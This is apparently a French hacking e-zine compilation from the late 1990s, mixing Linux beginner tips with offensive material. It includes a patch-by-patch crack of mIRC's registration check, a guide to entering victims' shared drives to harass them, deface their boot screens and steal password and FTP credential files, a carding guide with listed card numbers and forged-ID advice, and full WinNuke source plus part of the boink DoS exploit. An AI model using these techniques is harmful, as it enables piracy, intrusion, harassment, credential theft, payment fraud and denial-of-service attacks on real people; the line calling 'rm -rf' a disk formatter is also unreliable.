F2:  Affiche les registres du processeurs (EAX,EBX,EIP, les flags Carry, overflow...)
F4:  Nous montre ce qu'il se passe derriere Softice !!
F5:  Permet de Continuer l'execution du programme normalement.
F6:  Met le pointeur dans les commandes en Assembleur.
F8:  Trace Into. Execute le programme pas a pas et rentre dans les Call.
F9:  Met un Breackpoint a la ligne ou est le pointeur.
F10: Trace Out. Execute le programme pas a pas, ne rentre pas dans les Call.
F12: Permet de revenir dans l'appelant d'un Call.

Les commandes les plus importantes:
Task: Nous montre les programmes en tache de WinBug et donne leur nom.
Hwnd nom: Permet de montrer les boites de dialogues, les boutons...d'un programme.
Bmsg NøWindows_Handle: Met un breckpoint sur un message Windows.
Bmsg NøWindows_Handle WM_GETTEXT: voir plus bas
Bpint Nø: Permet de mettre un breackpoint sur une interruption. (Exemple: 21 !)
Bl:   Liste les breackpoint avec leur numero.
Bc *: Efface tous les breackpoints.
bd nø: Disable le breackpoint Nø...
be nø: Enable le breackpoint Nø...
hboot: Reboot L'ordinateur !


Explication de Bmsg Windows_Handle Wm_gettext:
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß

Admettons que nous avons un programme avec 2 Edit, un pour Le nom, et l'autre
pour rentrer le code.
Le numero d'un des deux edit est: 0B25
Vous rentrez la commande: bmsg 0B25 WM_gettext. puis vous apppuye sur F5
Dans l'edit vous marque n'importe quoi puis vous faites Ok.
Et a ce moment Soft Ice se lance.
Apres a vous de cracker le programme !
Le fonctionnement de ce breackpoint est plus complique que les autres car
il vous remet directement apres l'appel du code. Le programme lorsque vous
appuyez sur Ok Appel Windows et traite les donnees pour les boites de dialogues,
les couleurs, les polices... Ce breackpoint nous permet de tomber a l'endroit
ou le texte rentre est traite par Winodows et le programme !

Voila a peu pres ce qu'il faut savoir sur Soft Ice, apres c'est plus votre
connaissance en Assembleur qui jouera. Je vous reserve tout de meme
un crackage explique de mIRC 5.41 !! ;))
Cela vous donnera un peu de technique et vous aidera pour cracker en solitaire !!

Si je n'est pas été clair sur certain point ou si j'ai fait des erreurs
n'hésitez pas a me le dire par Mail à: FuNzZy@Hotmail.com

Ecrit par FuNzZy.

================================================================================================
                       Cracking: Cracker mIRC 5.41...   By FuNzZy
================================================================================================
                                                         
Suite au cours sur Soft Ice on va maintenant cracker mIRC 5.41.

Nous avons besoin des programmes suivant:
- Soft Ice !! ;)
- W32dasm xx
- Hexworkshop, Heidt ou un editeur Hexa.

Au demarrage chargez Soft Ice. Lancez mIRC 5.41 puis faites Help/Register.
Une boite de Dialogue aparait avec 2 edit et des boutons.
Lancez Soft Ice (Ctrl+D). Faites Task [Entrée].On voit alors que mirc5.41
est apelle mirc32. Pour savoir quel numéro porte l'un des Edit faites
Hwnd mirc32 [Entree]. On aperçoit maintenant quelques chose dans le genre:

Windows_Handle   Hqueue   Sz    Qowner    Classname
   xxxx           xxx     xx    xxxxxx      xxxxx   <-- ne nous interesse pas
   05AC           1167    32    mirc32      Edit    <-- ICI 
   xxxx           xxx     xx    xxxxxx      xxxxx   <-- ne nous interesse pas

Ici le numero de l'Edit est 05AC mais il change a chaque fois donc ne vous
etonnez pas si le votre est différent.
Maintenant nous allons mettre un Breackpoint sur cet Edit en tapant:
BMSG 05AC WM_GETTEXT [Entrée].
Appuyez sur F5 pour continuer l'execution de mIRC 5.41.
Rentrez un nom et un serial n'importe quoi puis cliquer sur Ok.
Soft Ice se lance et on se retrouve dans USER (Windows).
Nous allons retrouver l'appeleur de cet fonction en appuyant 6 fois sur F12.
Nous voila dans une autre partie de User. Maintenant appuyez une trentaine de
fois sur F10 jusqu'a l'arrivé dans mIRC32. Et nous trouvons ceci:

xxxx:0043D1BA   PUSH  004D1BB4      <--- Il met sur la pile le Serial
xxxx:0043D1BF   CALL  0048E608      Ici le call verifie le code
xxxx:0043D1C4   TEST  EAX,EAX       et Test si c'est le bon.
xxxx:0043D1C6   JZ    0043D257      Si EAX=0 le code est faux sinon il est bon.

Cliquez sur le CALL avec le bouton droit puis faites Display.
Notez le debut du code Hexadecimal: E84414050085C00F848B
On remarque que EBX est égal a 0087F9C4 et est donc different de zéro.
nous allons donc modifier le TEST EAX,EAX  par un TEST EBX,EBX !
Faites F10 pour avoir la ligne sur le TEST, puis tapez en ligne de commande:
a [Entrée]  TEST EBX,EBX [Entrée]
[ECHAP]
Maintenant recliquez sur Test avec le bouton droit puis faites Display.
Notez le Debut encore une fois: E84414050085DB0F848B
Faites F5 pour Sortir de Soft Ice. mIRC vous remercie de votre Enregistrement !
Maintenant il va falloir modifier le fichier mIRC32.exe grace a HexWorkShop
par exemple. Il suffit de rechercher le premier code hexadecimal et de le
remplacer par le deuxieme.
Mais en relancant le programme on remarque qu'il n'est pas enregistré.
Une commande au demarrage verifie si le code rentré est correct.
Nous allons donc nous servir de Wdasm32. Apres le désassemblage de mirc32.exe
faites une recherche du CALL qui verifiait le code au début. (Call 0048E608)
Il va en trouver deux, celui ou nous avons mis un test Ebx,ebx et un autre.
C'est donc le deuxième que nous devons modifier. Nous allons utiliser la meme
méthode qu'auparavant. Le code Hexadècimal de départ étant E839FEFFFF85C074498B
il va falloir le remplacer comme au début par E839FEFFFF85DB74498B !
Apres avoir modifier ceci grace a HexWorkShop relandez le programme, et
réengistré le. Voila votre programme est enregistré et le restera !

Si je n'est pas été clair sur certain point ou si j'ai fait des erreurs
n'hésité pas a me le dire par Mail à: FuNzZy@Hotmail.com

Ecrit par FuNzZy.

================================================================================================
			Comment s'amuser sur l'ordi d'une victime? By Fugitif
================================================================================================

Materiel necessaire:
- Connexion Internet.

Donc deja pour etre sur une machine à distance, j'ai fait un article
dans le n°1 pour ca mais le mec doit avoir les ressources partagees...
Ou sinon vous avez 2 autres possibilités:
- Le socket de troie.
- L'espion FTP.

Tous deux disponible sur notre site...
Biensur si vous connaissez d'autres facon de hacker un DD, de toute maniere 
une fois que vous etes sur le hd victime c'est pareil partout...

Regle primordial: Ne jamais supprimer des fichiers , ni formater le HD  sur
l'ordi de la victime.

Si vous utilisez le nbtstat:

P.S : Si vous voulez voir le HD en mode Windows, apres avoir taper
"nbtstat -R" allez dans "Demarrer/Rechercher/Ordinateur" et vous
tapez le nom de l'ordi,rechercher, il apparait dans la liste, vous doublez 
cliquez dessus, toutes les ressources partagees apparaissent cliquez sur
celle qui vous interresse... Ou alors quand vous avez tapé toutes les 
commandes msdos allez dans le lecteur attribué dans le poste de travail.

Si vous avez reperez quelqu'un ne lui dites pas des phrases comme:
"HAHAHAHA je vois ton HD, je suis un grand hacker et je fais ce
que je veux!!"
Sinon le mec va tout de suite savoir que c'est vous et va chercher
un moyen de se proteger.

Donc reperez quelqu'un et voyez un peu si il se connecte
regulierement.

Le jour arrive je me connecte, c'est bon il est connecte sur #IRC...
Donc je rentre dans son HD, tranquille :)

Bon il est l'heure de passer à l'acte.
1: Lui changer son logo.sys, faites en un beau genre avec Paint Shop Pro
avec marqué "Winbugs 95, encore plus de bugs, hacked by "vous".. " ou
des trucs
comme ca....
Donc faites le en 320*400 256 couleurs, et enregistrez-le en .bmp puis
renommez en logo.sys.Et copiez-le à la racine...
Ou c'est un petit con qui vous fait chier, mettez dans le logo.sys une 
bonne photo de cul hard, comme ca quand son pere va demarrez l'ordi, il va s'
enerver sur le gosse :))
Sinon vous pouvez aussi changer Logos.sys et logow.sys qui sont les logos 
quand vous eteignez l'ordi, mais cela on s'en fout un peu.
C'est deja ca.Si vous faites ca n'oublié pas de faire une sauvegarde du logo 
dans un dossier de l'ordi distant quand meme! :)

2: Bon, maintenant on passe à la deuxieme vitesse...
On va modifier l'autoexec.bat, donc comme l'avez dit Cedru dans le n°1,
toutes les commandes, ecrivez toutes au fond à droite le plus loin possible 
la ou les debutants n'iront pas chercher... 
Bon deja, il faut que le disque soit le disque dur principal, genre C:\.
Pour l'editez c'est simple ou vous en mode fenetre Dos donc une fois sur le 
disque vous tapez "edit autoexec.bat" ou alors en mode Windows, avec le bouton 
droit et faites edtiton...(biensur si vous utilisez le 
nbtstat.)

Mettez par exemple d'abord une phrase à la fin du autoexec.bat mais la  
normalement pas tout au fond à droite :)):

echo.
echo        **********************************   
echo        * Vous vous etes fait hacker par *
echo        * "votrenick", attention, je suis*
echo        * partout! hahahahahahahahahaha! *
echo        **********************************
echo.
pause

Voila vous ecrivez ce que vous voulez, des menaces etc....

On passe maintenant aux petites farces...

J'ai un petit prog qui simule le formatage de l'ordi, donc je le copie  
dans un dossier ou l'utilisateur n'ira pas le chercher par exemple dans:
C:\WINDOWS\SYSTEM\

"farce.exe"       : un petit programme qui simule le formattage du                                         
disque dur et le redemarre, mais vous inquietez pas,                                         
il abime rien au PC...

Une fois le fichier copie dans C:\WINDOWS\SYSTEM\ de l'ordi 
victime,allez editez l'autoexec.bat et rajoutez cette ligne bien 
au fond à droite:
C:\WINDOWS\SYSTEM\FARCE.EXE  : si vous avez copie le "FARCE.EXE".

Une fois ca dans l'autoexec.bat l'utilisateur redeamrre son ordi et 
paff! Il panique! Il croit dans DD est en cours de formattage :)) 
En fait c'est rien du tout!

Voila pour l'autoexec.bat ca suffira...

4:Envoyer lui des textes...
Voila premiere chose toute simple:
Faites un nouveau texte sur son ordi dans le dossier:
C:\WINDOWS\BUREAU\
C'est ici que le mec y fera le plus attention.
Nommez par exemple Hacking_in_progress.txt, la je peux vous
dire que le mec le vera le texte :))

A l'interieur, vous ecrivez ce que vous voulez, des menaces, des trucs
pour lui faire peur...etc...
Mais dans ce cas c'est le mec qui doit ouvrir le fichier.txt.

4: Le mec vous fait encore chier?
Ce petit conard fait toujours le malin?
Ben, la on va encore lui faire peur, ok??

Les 3 seules conditions:
- Qu'il ai une imprimante.
- Que son imprimante soit partagee.
- Qu'elle soit allume.

Vous l'aurez bien compris on va utiliser son imprimante à distance...
Rien de plus simple...

Donc vous etes connecte sur son HD, apres avoir taper nbtstat -R
allez dans rechercher/ordinateur et le nom de l'ordi, il apparait
dans la liste, double-cliquez sur le nom...
Toutes les ressources apparaissent et si il a une imprimante partage,
elle apparait aussi dans le liste, donc double-cliquez dessus.
Maintenant suivez les instructions, il faut mettre imprimante reseau...
Bon pour le modele on se casse pas la tete prenez, generique/texte seul 
(standard), bon des fois il demande d'inserez le CD de WIN95 donc
preparez le. Donc une fois l'imprimante installee, faites un texte, 
et faite mise en page choissisez donc l'imprimante Generique....
Ensuite imprimez, et voila ca imprime le texte chez le mec...

De quoi lui flanquez la trouille, surtout si il a plusieur imprimantes
elles se mettent toutes en route :))

Et quand meme n'en abusez, de ca, pasque l'encre ca coute cher...

Sinon si vous etes méchant, vous prenez les passwords de connexion
du gars , et aussi son ws_ftp.ini (Ws_ftp) et le tree.dat (Cute Ftp) 
qui est trés simple à decrypter.
Si le mec est sur un connexion quelconques, prenez son .pwl dans
c:\windows\
et decryptez-le à l'aide d'un prog ,j'en connais un qui s'appelle
Glide... Ou alors prenez son infonie.ini si c'est un infonien.

Bon vous voyez qu'on peut s'amuser le HD d'un con :))


================================================================================================
				Ca te dirait un peu de carding?(2/2) By Fugitif
================================================================================================

Materiel necessaire:
- Une assez grande boite aux lettres.

Bon, c'est bon, vous avez le n° de carte de credit de quelqu'un?
Mais comment l'utiliser haha?

En prenant le moins de risques....

Bon, alors, il faut que vous ayez une grande boite aux lettres pour que le
postier puissent mettre ce que vous avez commandez.
Ensuite trouver une entreprise qui est en faillite et ou il n'y a plus
personne qui passe par ici...
Donc posez votre boite aux lettres devant l'entreprise à la place de
l'ancienne boite aux lettres de l'entreprise.
C'est bon maintenant commandez ce que vous voulez par correspondance
sous le nom de la personne que vous avez arnaquer avec son n° de
carte bleue, et au moment ou il vous demande votre adresse vous dites
l'adresse de de l'entreprise en faillite, il faut que la commande n'excede
pas les 2000 frs sinon il vous demande des papiers lors de la reception
de votre commande.
Bon voila votre commande faite, maintenant allez recuperer votre
marchandise dans la boite aux lettres et voila c'est bon...
Un conseil, ne jamais commander à la meme adresse plusieurs fois
à chaque fois une differente une differente, ok?
Ca devrait suffir...

En prenant le plus de risques :)
Ben, commandez un truc aux 3 suisses, ensuite il faut que alliez le chercher
vous meme dans le magasin, et pour la reception du colis, il demande une
piece d'identité, c'est ca la merde!
Donc si vous etes un grand faussaire capable de faire des fausses cartes
d'identité ca ira ou alors si vous avez un ami faussaire, c'est le moment de
le foutre au boulot :) Sinon passez la route! Donc c'est bon tu as ta fausse 
carte biensur avec le nom le prenom du mec auquel vous avec pris le n° de 
carte de credit....
Allez chercher votre colis toujours trés naturel, la femme vous demande
une piece d'indentité , c'est bon, vous prenez le colis et vous vous 
cassez voila pas si dure nan?
Mais risquer c'est sur!

En passant je vous file 10 chtit n° de cb:

Master Card:
5507-4442-3051-9040 (4/99)
5262-0037-2242-3049 (3/99)
5793-5064-9196-3132 (3/99)
5043-7371-5929-1967 (8/99)
5194-0427-8811-0135 (3/99)

VISA card:
4005-3457-4304-5755 (8/99)
4936-5776-7255-5248 (5/99)
4068-5895-0632-6431 (3/99)
4701-1059-2384-2802 (2/99)
4009-7444-8473-3221 (1/99)

Vous pouvez vous en servir pour enregistrer certains programmes et
ce que vous voulez c'est pas mes affaires! :)


================================================================================================
			Installer Linux et quelques trucs de base... By Fugitif
================================================================================================

Materiel nécéssaire:
- Linux.

Cet article est fait pour ceux qui désire installer Linux et débuter.

Donc deja, pourquoi installer Linux?
Bon, moi deja j'ai installé Linux pour elargir mes connaissances, donc 
connaitre un nouvel OS, et biensur pour le Hacking. Linux est un 
systéme plus approprier au Hacking que Win95. Mais bon, chacun son OS...

Moi, j'ai personnellment installé Linux il y a 1 semaines ou 2 avec la
distribution Red Hat 5.0.

Bon on demarre! :)

Pour installer Linux , on a besoin de 2 partitions:
-Une partition Linux Swap qui devra la taille de votre Ram voir plus.
-Une partition Linux Natif qui contiendra les packages et vos fichiers.

Soit vous l'installer sur un nouveau HD, ce qui semble la meilleur 
solution. Soit vous partitionnez votre HD, ou se trouver sans doute Win95, 
ais la vous allez devoir formatter pour recreer une partition win95 plus 
petite pour pouvoir creer dans le HD les deux autres partitions.(biensur 
si vous gardez win95...)

Prenons mon cas , j'ai partionné mon seul et unique hd qui fait 1200 mo et
des poussieres:
-Partition win95:  500 mo
-Partition Swap :   32 mo
-Partition Natif:  675 mo

Si vous voulez des partitions comme moi avec Win et Linux sur le meme Hd, il
va falloir formatter et oui!!! Sauf si vous utilisez un logiciel de
partionnement nommé Partition Magic...

Donc formatter, avec votre disquette de Boot, lancé le fdisk livré avec
Windows. Avec fdisk creez une partition principale qui contiendra windows...
Installez Windows et voila...

Maintenant on passe à Linux:
Generalement Linux est livré avec une Disquette de boot ou un programme pour
la faire. Donc redemarrez avec la disquette:
Dans mon cas il faut  appyuer sur entrée pour installer linux.
Ensuite l'installation vous pose des questions trés simple comme:
"Avez-vous un moniteur couleur?"
"Avez-vous un controleur Scsi?"

On arrive au moment de faire les partitions , Red Hat vous propose 2 progs:
fdisk ou disk druid:
moi j'ai choisi fdisk, car je trouve disk druid un peu naze, enfin c'est
mon avis...
Si vous avez plusieur HD selectionnez celui ou vous voulez faire les
partitions.
Donc selectionnez fdisk:
Appyuez sur p pour voir les partitions actuelles:
normalment que celle de Windows...

Creation de la partition Swap:
Tapez n (nouvelle partition)
p (pour primaire)
puis le n° de la partition dans notre cas: 2 (car la premiere est
celle de win).

Ensuite il vous demande les cylindres, c'est simple:
admettons que les cylindres soit (256-458) il faudrait tapez: 256
donc tapez le premier nombre: 256

Ensuite il vous demande la taille de la partition, la il faut tapez
la taille de votre RAM en mo, comme j'ai 32 mo je tape: +32M

Si vous avez 128 mo de RAM, vous taperez: +128M
Si vous avez 16 mo  il est conseillé de mettre dans la swap plus que votre
memoire vive, donc mettez-y 32 mo.

ensuite tapez:
t (pour definir le type de la parition).
2 (le n° de la partition).
82 (pour le type SWAP)

Regardez avec p si la partition à bien était creeé, et que c'est une parition
SWAP...

Creation de la partition Natif:
tapez:
n (nouvelle partition)
p (primaire)
3 (troisieme partition)
459 (premier cylindre de libre)
+675M (pour cette taille c'est vous qui voyez en fonction de votre place 
sur le HD)

Maintenant tapez:
t (type)
3 (le n° de la partition)
83 (linux Natif)

Regardez avec p, verifiez si les deux partitions linux (SWAP et Natif) y sont.
Dans le cas contraire, vous avez du faire une erreur de frappe ou peut etre
que c'est moi :))

Pour finir et enregistrer les partitions tapez: w

Maintenant ca retourne à l'installation de Linux.
Faites terminé pour continuez l'installation, maintenant le plus dur est
fait, plus besoin d'aide pour le reste, l'installation est simple:
Choix des packages, configuration de la carte video et de l'ecran, carte son
reglage de l'heure, imprimante, mot de passe root etc etc...

Moi j'ai installé LILO BOOT sur le mbr, à vous de voir, au prompt LILO
ou je tape entrée pour demarrer en Linux ou je tape dos pour demarrer en
Windows...

Demarrez en Linux, il se charge:
Login: root
password: (votre passe defini durant l'installation)

Vous voila loguez en root.

Bon, maintenant les commandes de bases:

Deja si vous ne comprenez pas une commande, la chose la plus simple a faire
et de taper:
man lacommande
ex:
man ls
(ps: il faut taper les commandes en minuscules :))

STARTX: demarrer X-Windows.
SETUP: lance Xconfigurator , pour configurer le son, l'image de X-win.
CLEAR: cls dos pour linux.
LS: equivalent de dir sous dos.(pour afficher le contenu d'un repertoire).

CD: pour changer de repertoire. ex: CD repertoire et pour revenir a la
racine:
CD / 
et pour revenir a repertoire d'avant: 
CD ..

FIND: pour trouver un fichier.
WHEREIS: pareil que find.
CAT: Meme chose que type sous dos.
RM: pour supprimer un fichier.
RM -RF: pour formater le HD.
WHO: pour voir si il y a des utilisateur connecte sur la becanne en cours.
REBOOT ou SHUTDOWN ou HALT: pour redemarrer la becanne.
DF: pour voir la place restante sur le HD.

GZIP: pour decompresser les fichiers de type .tar.gz ou .tgz ou .gz
Ex de commande:
-pour decompresser:
GZIP -d nomdufichier.tgz
-pour compresser:
GZIP nomdufichier

PS: afficher les pids: necessaire pour kill.
KILL: pour tuer un procesus.ex: KILL pid (pid: n° de processus).
MAN: manuel de commandes. ex: MAN ls.

MOUNT: pour monter un systeme de fichier:
ex:mount -t systeme_de_fichier nom_partition point_de_montage
-systeme de fichier: msdos,umsdos,ext2,minix, iso9660...
-nom partition: nom de la partition a monter.
-fd0: disquette./dev/hdb1= second hd, premiere partition.
-point de montage: dossier dans lequel la partition doit etre monter. 
exemple de montage d'un cdrom ide dans le dossier /mnt:
mount -t iso9660 /dev/hdc /mnt/cdrom
Le cdrom sera monter dans /mnt/cdrom.
Pour la disquette : (disons une disquette msdos)
mount -t msdos /dev/fd0 /mnt/floppy (fd0 pour le premier lecteur
de disquette , fd1 pour le second..)
La disqette sera monter dans /mnt/floppy.

SET: pour afficher les variables en cours du systeme.

UMOUNT: pour demonter un systeme de fichier, ex:
umount /floppy (pour la disquette).

DATE: pour afficher la date.
MORE: pour voir le contenu d'un fichier.

CP: copier un fichier, ex:
cp fichier_original  fichier_destination

MV: renommer un fichier, ex:
mv ancien_nom nouveau_nom 

GREP: rechercher expresion dans un fichier, ex:
grep "expression" nomdufichier

MKDIR: creation de dossier.
RMDIR: supprimer un dossier.

ADDUSER: pour creer un compte de simple user sur la becanne, ex:
adduser nom
apres avoir fais ceci, il faut definir un pass, tapez la commande:
passwd nom

USERDEL: pour supprimer un utilisateur, ex:
userdel -r nom

SU : pour se logguer en simple user dans une session:
su - nom 

CHMOD : cette commande sert a rendre excutable un fichier avec les droits
desires.
CHGRP : pour changer le groupe d'un fichier ou d'un utilisateur.

TAR : il y a plusieur synthaxes pour cette commande:
tar xvf file (pour detarer un fichier)
tar tvf file (pour voir ce qu'il y a dedans)
tar xzvf file (autre facon de le detarrer)

UNZIP : pour dezipper les zips.

CC, GCC et G++ : pour compiler des fichiers.c , ex:
cc fichier.c -o prog
ou
gcc fichier.c -o prog
ou
g++ fichier.c -o prog

./ : commande pour exucter un prog dans un repertoire ou vous etes , ex:
./prog 

XRDB: pour charger des ressources exemples:
xrdb -load fichier

Donc voila c'était les quelques commandes de bases à savoir, pour bien
débuter...

Et maintenant vous allez pouvoir ressortir vos vieux Noway et Noroute,
il y a beaucoup de hack Linux et de trés bonne qualité...


================================================================================================
				Se connecter à Internet avec Linux? By Fugitif
================================================================================================

Deja une chose à savoir:
Ne jamais se connecter en root sur Internet surtout sur Irc ou les
programmes du genre, il faut etre en Simple User.

Donc premiere chose  à faire si vous allez sur irc :
Se creer un compte simple user, de la maniere suivante:
adduser nom
passwd nom
ex:
adduser james
passwd james
Ensuite ca vous dit d'entrer un pass ben tapez le:
ex:
007

Voila votre compte James est fait.

Mais maintenant il faut faire un script de connexion
pour se connecter, il faut le faire en etant root.

Cette doc vous montre comment vous connecter sur Internet avec la
console ou X-Windows.  
<A finir>
================================================================================================
				Quelques petites astuces Linux By Fugitif
================================================================================================

Voila quelques trucs à savoir:

------------------------------------------------------------------------------

Pour faire plusieurs sessions sous la console:

La premiere session est celle du demarrage:
Pour faire des nouvelles sessions:
Alt+F2 pour la session deux, Alt+F3 pour la session 3 etc.. etc...
Ensuite pour y aller pareil...

------------------------------------------------------------------------------

Pour eviter les plantages de types $NODISPLAY:

Ce plantage arrive assez souvent, un programme marche en root, mais pas
en simple user, ca m'est arrivé surtout sur les progs irc comme: Tkirc,
Zircon..

Logguez-vous en simple user:
Tapez ceci avant de lancer le prog:
export DISPLAY=:0.0

------------------------------------------------------------------------------


Astuce pour aller sur la partition de WIN95

Cette astuce est valable si la partoche de win est la premiere
partoche. Go!

Fichier Fstab a configurer:
Allez dans /etc: (cd /etc)

Tapez emacs fstab:
ensuite ecrivez ceux-ci: (commentaires)

/dev/hda3 / ext2 defaults 1 1 (Partition Natif contenant les packages)
/dev/hda2 swap swap defaults 0 0 (Partition Swap)
/dev/hda1 /mnt/win msdos noauto 0 0 (Partition Windows)
/dev/fd0 /mnt/floppy msdos noauto 0 0 (Lecteur de Disquette)
/dev/cdrom /mnt/cdrom iso9660 noauto,ro 0 0 (Lecteur CD-ROM)
none /proc defaults 0 0 (Fichiers temporaires)

Quitter emacs en tapant Ctrl x et c , et repondez yes pour sauvegarder.

Ensuite aller dans /mnt (cd /mnt)
Pour rentrer dans la partition primaire:
tapez mkdir win et mount win et enfin
cd win, et voila dans le c: du windows...

Donc la partoche Windows à pour point de montage win.

-----------------------------------------------------------------------------
Que faire avec un fichier .tgz ou .gz ?

Bon, premiere chose à faire : decompacter , avec la commande suivante:
gzip -d fichier.tgz
Le fichier tgz est transformé en fichier.tar (normalement)...
Deuxieme chose à faire : detarrer , avec la commande suivante :
tar xvf fichier.tar

Ou alors si vous l'avez directement en .tar, vous tapez:
tar xvf fichier.tar

Et si tous se passe bien, vous aurez le repertoire decompréssé du
fichier.

-----------------------------------------------------------------------------

Sous X-windows il ne faut pas laisser  sur le clavier Num Lock et Scroll Lock 
allumé, ils peuvent provoquer le bloquage de fenetre...

-----------------------------------------------------------------------------

Si vous voulez fermer vos ports (telnet, ftp...) allez dans /etc/ et editez
le fichier inetd.conf avec emacs, et foutez tout en commentaires avec des #.

-----------------------------------------------------------------------------
Voila pour les 'tites astuces.

================================================================================================
	Mieux comprendre les droits des fichiers et des repertoires sous Linux By Fugitif
================================================================================================

Voila encore une chose à savoir sous Linux:
Surtout pour se servir de la commande chmod pour attribuer des droits
aux utilisateurs de votre Linux.

Tous les fichiers et les repertoires ont des infos definis, ils doivent 
etre definis en super user:
Quand vous tapez ls -l dans repertoire quelconque:

-rw-------   1 root     sys            0 Jul  7 11:31 nohup.out
drwx------   2 root     sys           24 Jun 11 17:11 nsmail

Admettons qui il y ai plus d'infos comme ca:
ces infos sont dans plusieurs colones separés:
Chacune de ces colonnes donne une infos:
-rw-------   1                 root      sys      0        Jul  7 11:31 nohup.out(nom)
 droits    |nb_de_liens_hard |proprio | groupe | taille |date de la derniere modife |     

La taille est indiqué en octets.
Et nous laissons de coté, le nombre de lien hard.

Le plus compliqué à comprendre, c'est les droits, le reste comme vous le 
voyez est simple...

Il sont composé de lettre comme ceux ci:
-rwxr-xr-x

Chaque lettre est une abréviation:
- = fichier normal | d = directory | s = socket | c = device en mode 
char | b = device en mode block | l = lien symbolique |

Note:Avec les liens symboliques (l) ce qu'il y a derriere n'a aucune 
importance. 

Tout les caractere des droits sont nommes "char".
Les groupes de char au-dessus indique les permissions  dans 
l'ordre suivant: -le proprietaire-les membres du groupe-les autres.
        comme  : -      rwxr     -        xr           -     x

Ce qui suit vas vous servir pour chmod:
Quand on utilise chmod sur repertoire ou un prog, on doit lui attribué 
une valeur qui définis les droits de l'utilisation de ce repertoire ou 
ce fichier.

Comme je l'avais dit les droits sont definis par des lettres appeler 
"char", que l'on doit convertir en nombres pour pouvoir utiliser 
chmod.

r = read ; w = write ; x = execute ; s = setuid-bit ; t = sticky-bit
On laisse aussi de coté setuid-bit et sticky-bit. 

r= le droit de lecture.
w= le droit de pouvoir ecrire donc modifier des fichiers, poser des fichiers....
x= le droit d'executer.
s= On vera aprés.
t= On vera aprés.

Ces lettres on des valeurs:
r = 4 | w = 2 | x=1 | s=4 | t=1 |

par ex:
7 = 4+2+1 = tous les droits.
5 = 4+1 = lecture + execution.

Nous allons prendre exemple sur ce droit, nous faisons ls sur un programme de mail
(ex:ls mail):
r--rw---x
Le premier char correspond au proprietaire(root) le deuxieme char au groupe(s) et 
le troisieme char aux autres utilisateur.

Donc résumons, le super user (root) n'as que le droit de lecture(r)(ce n'est qu'un 
exemple car le root à tous les droits normalment), le groupe(s) a le droit de lecture 
et d'ecriture (r et w), et les autres utilisateurs ont le droit d'executer (x).

Maintenant il faut convertir r--rw---x en nombres donc:
super user(root) | r = 4
groupe(s) | r + w= 4 + 2 = 6
autres users | x = 1

Il faut compter les les chiffres dans ce sens: super user(root),groupe,autres users.
Ce qui nous donne 461.

Mainteant il suffit de taper chmod 461 fichier ou chmod 461 repertoire.
Et le fichier ou le repertoires aura ces droits aura ces droits.

Par ex: pour donner tous les droit à tous le monde, on tape:
chmod 777 fichier
ca donnera : rwxrwxrwx

Compris? pas si dure...

================================================================================================
				Quelques progs de hacking Linux By Fugitif
================================================================================================

J'ai mis ici quelques progs en .c , ce sont les plus connu :
-Winnuke
-Boink
-Teardrop

Il serve à crasher une becanne Win 95/ Nt, sinon vous pouvez en trouver plein
sur notre site, il y a à peu pres 150 prog en .c donc vous aurez le choix :)
Je rappel l'adresse:
http://members.xoom.com/deathlyby/

Maintenant les progs : (a vous de les compiler :))
Si jamais il y a une erreur de fichier.h , j'en ai mis trois sur le site qui 
sont important pour les progs de hack...

******************************************************************************

--------8<--Couper ici (Winnuke)---8<-----------------------------------------

/* winnuke.c - (05/07/97)  By _eci  */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */


#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#define dport 139  /* Attack port: 139 is what we want */

int x, s;
char *str = "Bye";  /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;


int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_addr.s_addr=inet_addr(server);
     blah.sin_port=htons(port);


    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("Connected to [%s:%d].\n",server,port);
        return;
}


void main(int argc, char *argv[]) {

     if (argc != 2) {
       printf("Usage: %s <target>\n",argv[0]);
       exit(0);
     }

     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }

     open_sock(s,argv[1],dport);


     printf("Sending crash... ");
       send(s,str,strlen(str),MSG_OOB);
       usleep(100000);
     printf("Done!\n");
     close(s);
}

   
--------8<--Fin de Winnuke---------8<-----------------------------------------

******************************************************************************

--------8<--Couper ici (Boink)-----8<-----------------------------------------


/*
  boink.c - a modified bonk.c
  
  [ http://www.rootshell.com/ ]
    
    
                                ==bendi - 1998==

                        bonk.c        -         5/01/1998
        Based On: teardrop.c by route|daemon9 & klepto
        Crashes *patched* win95/(NT?) machines.

        Basically, we set the frag offset > header length (teardrop
        reversed). There are many theories as to why this works,
        however i do not have the resources to perform extensive testing.
        I make no warranties. Use this code at your own risk.
        Rip it if you like, i've had my fun.

    Modified by defile(efnet) [9/01/98]
        
        As it stood before, bonk.c just simply attacked port 55.
        Upon scanning my associates, I've noticed port 55 isn't
        always open. It varies in fact, while other ports remain
        open and vulnerable to this attack. I realized that Microsoft
        just might fix this by blocking port 55 off or something
        completely lame like that, and that is unacceptable.
        
        As of this modification, you provide both a "start" and a
        "stop" port to test for the weakness, in the attempt to catch
        a possibly open port. (I've noticed port 55 seemed to come open
        more frequently on machines that were running IE though)
        
        Hopefully this will encourage Microsoft to write a REAL fix
        instead of just make lackey fixes as they've had in the past.
        
        Please only use this to test your own systems for vulnerability,
        and if it is, bitch at Microsoft for a fix. I am not responsible
        for any damage that may come and as stated above by the
        author, this might not even work. I make no claims
        to the ownership to any portions of this source in any way.
        
        
*/

#include <stdio.h>
#include <string.h>

#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>

#define FRG_CONST       0x3
#define PADDING         0x1c

struct udp_pkt
{
        struct iphdr    ip;
        struct udphdr   udp;
        char data[PADDING];
} pkt;

